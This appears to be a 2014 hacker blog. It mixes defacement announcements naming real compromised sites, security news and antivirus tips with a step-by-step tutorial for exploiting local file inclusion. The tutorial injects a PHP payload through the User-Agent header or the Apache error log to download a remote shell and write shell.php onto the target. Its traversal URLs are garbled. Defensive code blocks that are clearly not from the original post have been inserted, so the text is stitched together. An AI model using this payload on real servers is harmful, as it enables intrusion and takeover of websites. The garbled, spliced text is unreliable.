Friday, 24 January 2014

WHMCS HACKED BY b0x

WHMCS Hacked by b0x | WWW.MaDLeeTs.Com

Deface Url:

http://docs.whmcs.com/images/b0x.html



Zone-H:

http://zone-h.org/mirror/id/21518159

Thursday, 23 January 2014

Justin Bieber arrested in Miami Beach for drunk driving..






Pop star Justin Bieber has been arrested in Florida accused of drunken driving and drag racing.
The Miami Beach Police Department said he was detained after racing on a street early on Thursday and had failed an alcohol test.
The 19-year-old has had several run-ins with police in recent years.
The arrest comes a week after his home in Los Angeles was searched by police following allegations he had thrown eggs at his neighbour's house.
He was accused of causing significant damage to the property. One member of his entourage was arrested for alleged drug possession following the search.
In the latest incident, the Associated Press quoted police as saying the singer had been driving a yellow Lamborghini when he was arrested in the early hours of Thursday.
The Miami Herald reported that members of the musician's entourage had apparently used their cars to block traffic on Pine Tree Drive at 26th Street, effectively creating a drag strip.
The driver of a second car, a red Ferrari, was also arrested and both cars impounded, said Miami-Dade Police spokesman Sgt Bobby Hernandez.
Police later named the other driver as an R&B singer known as Khalil.
The street where police say the singer was racing is a residential area in mid-Miami Beach.
Small apartment buildings are along one side of the street and on the other side are a high school, a youth centre, a golf course and a fire station.
In 2013, the Canadian singer was asked to remove graffiti he had left on the wall of a hotel in Australia. That came a month after he was charged in Brazil over a similar offence.
In 2012 he faced accusations of reckless driving, although prosecutors declined to press charges.
Justin Bieber lives in a gated community in Calabasas, about 30 miles north-west of central Los Angeles.

Researcher gets $33,500 for Remote Code Execution Vulnerability in Facebook..



A critical bug has been discovered in Facebook, earning the biggest bounty Facebook has ever paid for a vulnerability report on its website.

Reginaldo Silva, a Brazilian hacker, has discovered a highly critical Remote Code Execution (RCE) vulnerability in Facebook which could have allowed attackers to read any file from the server. It could also have allowed attackers to run malicious code on the server.

In September 2012, he first discovered an XML External Entity Expansion bug in the Drupal code that handled OpenID. OpenID is an open technology that allows users to authenticate to websites without having to create a new password.

He found a similar bug affecting Google's App Engine and Blogger. However, it was not critical, as he wasn't able to access arbitrary files or open network connections; he received a $500 reward from Google.

He found that plenty of other websites implementing OpenID were vulnerable to RCE.

Recently, Silva learned that Facebook's "forgot password" page also uses an OpenID provider to verify the identity of the user. He managed to discover an XXE bug in Facebook that allowed him to read the "/etc/passwd" file from the server.

"Since I didn't want to cause the wrong impressions, I decided I would report the bug right away, ask for permission to try to escalate it to a RCE and then work on it while it was being fixed." Silva wrote in his blog.

He thought it would take time to fix the bug. However, the Facebook security team responded quickly and fixed the issue within 3.5 hours.

"I decided to tell the security team what I'd do to escalate my access and trust them to be honest when they tested to see if the attack I had in my mind worked or not. I'm glad I did that. After a few back and forth emails, the security team confirmed that my attack was sound and that I had indeed found a RCE affecting their servers." Silva said.

He has been rewarded with a bounty of $33,500.
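One common hardening against the XXE bug class described above is to refuse any DOCTYPE in XML received from a remote party, such as an OpenID discovery document. This is an added example, not code from Silva, Facebook or Drupal; the function names and both sample documents are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

class ForbiddenXML(ValueError):
    """Untrusted XML tried to declare a DTD or an entity."""

def _forbid(kind):
    def handler(*_args):
        raise ForbiddenXML(f"{kind} is not allowed in untrusted XML")
    return handler

def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Build an element tree, aborting at the first DOCTYPE or entity declaration."""
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()
    # XXE needs a DTD to define the entity, so rejecting the DOCTYPE stops it
    # before any entity can be declared or resolved.
    parser.StartDoctypeDeclHandler = _forbid("DOCTYPE")
    parser.EntityDeclHandler = _forbid("entity declaration")
    parser.ExternalEntityRefHandler = _forbid("external entity reference")
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(data, True)
    return builder.close()

def discovery_uris(data: bytes):
    """Return the <URI> values of a discovery document, or None if it was rejected."""
    try:
        root = parse_untrusted_xml(data)
    except (ForbiddenXML, expat.ExpatError):
        return None
    return [el.text for el in root.iter("URI")]

# Constructed samples: a plain discovery document and one that declares an external entity.
PLAIN = b"""<?xml version="1.0"?>
<XRDS><XRD><Service><URI>https://op.example/endpoint</URI></Service></XRD></XRDS>"""
WITH_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE XRDS [<!ENTITY ext SYSTEM "file:///constructed/placeholder">]>
<XRDS><XRD><Service><URI>&ext;</URI></Service></XRD></XRDS>"""

if __name__ == "__main__":
    print(discovery_uris(PLAIN))     # list with the endpoint URI
    print(discovery_uris(WITH_DTD))  # None: rejected at the DOCTYPE
```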

Wednesday, 22 January 2014

Notorious Hacker Guccifer Reportedly Arrested in Romania.. Cyber switch news

The man who brought us the George W. Bush paintings has reportedly been arrested: On Wednesday night, Romanian authorities arrested Marcel Lazăr Lehel, the 40-year-old man accused of being the hacker Guccifer, at his home in Arad. Guccifer has hacked into the email accounts of Colin Powell, family members and friends of at least three U.S. presidents, plus numerous other celebrities and officials.
According to Softpedia and various Romanian news sources, Romania's Directorate for Investigating Organized Crime and Terrorism (DIICOT) raided Lazăr Lehel's home last night. He was reportedly arrested shortly after.
This isn't the first time Lazăr Lehel has been arrested for hacking: In February 2012, he was convicted of dozens of hacking-related charges and received a three-year suspended sentence. Those charges stemmed from Lazăr Lehel's attacks on dozens of Romanian officials between October 2010 and July 2011.

Official PERL Blogs hacked, 2,924 Author Credentials Leaked by ICR - Cyber Switch News

Today the Islamic Cyber Resistance (ICR) announced a breach of the official Perl blogs (http://blogs.perl.org).
The breach saw 2,924 user account credentials published to quickleak.org, and a deface page was added to the blog, though it did not disrupt the actual website.
In the release note posted by the hackers, they state that the attack was carried out to show support for the Syrian Electronic Army.
Islamic Cyber Resistance Hacked Blogs.perl.org to Show Support Syrian People And SEA
They Are Fighting Every Day and Every Night With Terrorist and Al-QAEDA
The leaked data belongs to the authors of the blog, of whom 2,554 have full credentials, 2,363 of those being non-duplicates. Full credentials included user names, email addresses, encrypted passwords, websites and API passwords, as well as other site/server related information.
Even though the passwords are encrypted, this offers little protection to those who have been breached, who include administrators and owners of other big, well-known services or websites.
At the time of publishing, it appears the admins are aware of the breach and the deface file has been removed.

Security tips to Avoid Virus / Trojan / Keylogger Infection..

1. Install a good antivirus. Free or paid is fine, but don't use cracked or pirated versions.

2. Install real-time anti-spyware protection.

3. Update your antivirus programs daily.

4. Perform scans on your computer daily.

5. Disable autorun to prevent infection from pendrives.

6. Disable image previews if using Outlook.

7. Use a good antivirus which has browser plugins and scans all URLs for malicious content.

8. Use a hardware-based firewall.

9. Don't click on any mail links or attachments from unknown sources or malicious users.

10. Never download software from third-party sites. Download from the original website. Don't use cracks or keygens, which may themselves be a virus/trojan.

Uploading Shell Via LFI Vul..

Today I Am Going To Teach You Two Ways Of Uploading Shell Via LFI Vul..

ReQuirement:- website vul to lfi.

MethoD 1:-

NOTE: You will need FireFox and its
addon Tamper Data to do this
method!

LFI, or Local File Inclusion, allows you to include a local file (that is, a file stored on the server) and run it in a web script.

In this method we are going to
upload a shell by accessing the proc/self/environ.

Now we have our page:-

http://www.target.com/index.php?
include=register.php

And now we are going to do this:-

http://www.target.com/index.php?
include=../

If it gives you an error message , this
is good. Best thing that can happen is, it says "No such file or directory".

But anyways, now add this to your url:-

http://www.target.com/index.php?
include=../etc/passwd

And as long as there is no text other
than an error message on the page,
keep adding "../" to the URL, so it would be like:

http://www.target.com/index.php?
include=.../passwd

http://www.target.com/index.php?
include=.../passwd

http://www.target.com/index.php?
include=.../passwd

And so on. Now let's say we got to this URL:-

http://www.target.com/index.php?
include=.../passwd

And we see some huge shitty text we
can not handle with. Now change the
etc/passwd in the URL to proc/self/environ so it would look like this:

http://www.target.com/index.php?
include=...environ

If you see some text, you did good, if
you see an error message you did
bad. Now this is the point where we
use Tamper Data. Start you Tamper
and reload the page, and for user
agent you type in the following PHP script:-

PHP Code:-

<?php $file = fopen
("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>

This will execute the PHP script on the site and create a shell.php on the server. Why? Because the User-Agent header is echoed in the included proc/self/environ output, so any PHP placed in it is executed when the file is included.

Now simply access your shell by going to

http://www.taget.com/shell.php

And rape the server.

Now LFI method 2:-

NOTE: This only works on apache servers!

Alright you get back to the point
where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd,
you will try to get access to apache/
logs/error.log

If you have a brain, you should know
how to do that, since it's EXACTLY
the same method as on etc/passwd
(explained in LFI method 1).

Now when you have found the file,
open up cmd and type in
Code:

telnet http://www.tagrget.com
80

When you are inside the telnet, you
copy the following code (you use your
own shell url:

PHP Code:

<?php $file = fopen
("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>

Paste it into the telnet window, and
press enter once or maybe twice(until
you get an error message).

Now refresh the page in the browser
(error.log) once and there you go.

The PHP script will be executed and
your shell will get uploaded to the
server. 
Access it by typing in the
following into your browser:-

http://www.taget.com/shell.php

ENJOY... 
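Both methods above leave the same traces in the web server's access log: traversal sequences aimed at proc/self/environ, etc/passwd or a log file, and PHP source in a client-controlled field such as the User-Agent. The following added example (not part of the original post) flags those traces; the log format, rule names and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined log format: ip - - [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>(?:[^"\\]|\\.)*)" '
                    r'\d{3} \S+ "(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>.*)"$')
TRAVERSAL = re.compile(r'\.\.[/\\]')
SENSITIVE = re.compile(r'proc/self/environ|etc/passwd|logs?/(?:error|access)[._]log', re.I)
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)

def decode(value, rounds=3):  # undo nested URL encoding: ..%252f -> ../
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(line):
    """Return (client_ip, indicator names) for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return "?", ["unparsed"]
    found, request = [], decode(m["req"])
    if TRAVERSAL.search(request):
        found.append("path-traversal")
    if SENSITIVE.search(request):
        found.append("sensitive-file-include")
    # PHP source in a client-controlled field is the injection half of the technique.
    found += [f"php-in-{f}" for f in ("req", "ref", "ua") if PHP_TAG.search(decode(m[f]))]
    return m["ip"], found

def triage(lines):
    """Group indicators per client and mark clients that inject PHP and include a file."""
    per_ip = defaultdict(set)
    for ip, found in map(classify, lines):
        per_ip[ip].update(found)
    for hits in per_ip.values():
        if "sensitive-file-include" in hits and any(h.startswith("php-in-") for h in hits):
            hits.add("lfi-code-injection-chain")
    return {ip: sorted(hits) for ip, hits in per_ip.items() if hits}

# Constructed sample lines (documentation addresses), not taken from a real server.
SAMPLE = [
    '198.51.100.7 - - [24/Jan/2014:10:00:01 +0000] "GET /index.php?include=register.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [24/Jan/2014:10:02:11 +0000] "GET /index.php?include=../../../../etc/passwd HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [24/Jan/2014:10:03:40 +0000] "GET /index.php?include=..%2f..%2f..%2f..%2fproc%2fself%2fenviron HTTP/1.1" 200 980 "-" "<?php /* constructed placeholder */ ?>"',
]
if __name__ == "__main__":
    print(triage(SAMPLE))
```

A client marked `lfi-code-injection-chain` warrants a check of the web root for newly created .php files, since that is the end state the post describes.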

6 Official Domains of Ubuntu One Hacked and Defaced by Indonesian Gantengers Crew - Cyberswitch News



Ubuntu One, a cloud service and OpenID-based single sign-on service operated by Canonical Ltd, had 6 of its domains defaced a few hours ago. SultanHaikal from Gantengers Crew contacted us and explained that the reason for hacking the Ubuntu One domains was to show people that nothing is fully secure.


Sultan Haikal left a deface page along with a message on all 6 hacked domains, which reads:


Special Message: You say that you are a hacker, Defacer, but you are proud? it turns out that you are proud, you are a newbie WE ARE GANTENGERS CREW SultanHaikal – d3b~X – Brian Kamikaze – Coupdegrace – Mdn_newbie – Index Php...


This is not the first time Ubuntu has been hacked. Last year the database of the Ubuntu forum was hacked, and the hackers got access to the usernames, passwords and email addresses of every registered user.
We have contacted the Ubuntu PR desk for an update from their side, and the article will be updated as soon as we get a reply.
At the time of publishing this article, all 6 Ubuntu One domains were hacked and displaying the deface page left by the hackers.
UPDATE: Ubuntu has replied to us as follows:
  • We’re currently investigating. In the meantime, on initial investigation, looks as though these people have simply uploaded a ‘defacement’ HTML file to the Ubuntu One file-sharing service. This would not be considered a ‘hack’, and is part of the normal operation of Ubuntu One. A file uploaded in this way does not pose a risk to Ubuntu One or its users.


Sunday, 19 January 2014

Hacked By Team MaXiMiZerS



./Mirror :-
http://zone-h.com/archive/notifier=MaXiMiZers
http://dark-h.org/hacker/?s=1&user=MaXiMiZers


./Team MaXiMiZers

"NEPAL HEALTH FEDERATION" stamped by "CyBER-71 hacker group"

"Greets: BDXTOR, CODE-X-1337, 1337 AHMED, and CyBER-71 family"

SITE: http://www.nepalhpf.org/
MIRROR: http://www.zone-h.com/mirror/id/21599241

Hacked By 3vil 3y3


                     3vil 3y3 is on fucking mood 


Some search engine and high profile website stamped by 3vil 3y3 

Shared torrents the biggest torrent website pawned!


http://sharedtorrents.com/1.htm

http://zone-h.com/mirror/id/21588374

world largest movie search engine stamped!

http://zshare-movies.com/delicieux/

http://zone-h.com/mirror/id/21588054

Popular Uk premium job website hacked by 3vil 3y3
http://actionevolution.co.uk/job/

http://zone-h.com/mirror/id/21587998

PDF search engine owned too.

http://searchsharedpdf.com/

http://zone-h.com/mirror/id/21588548
